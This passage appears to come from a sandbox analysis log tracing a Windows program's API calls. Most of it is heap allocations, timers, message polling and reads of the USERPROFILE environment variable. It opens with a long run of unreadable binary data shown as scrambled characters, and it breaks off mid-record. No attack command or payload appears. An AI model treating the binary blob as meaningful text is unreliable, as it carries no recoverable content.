멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 32 [0203.977] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0203.977] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0204.728] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0204.728] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.728] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0204.729] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0204.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0204.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0204.730] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0204.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0204.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0204.731] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.731] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0204.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0204.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0204.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0204.733] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0204.733] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0204.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0204.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0204.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0204.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0204.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0204.735] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 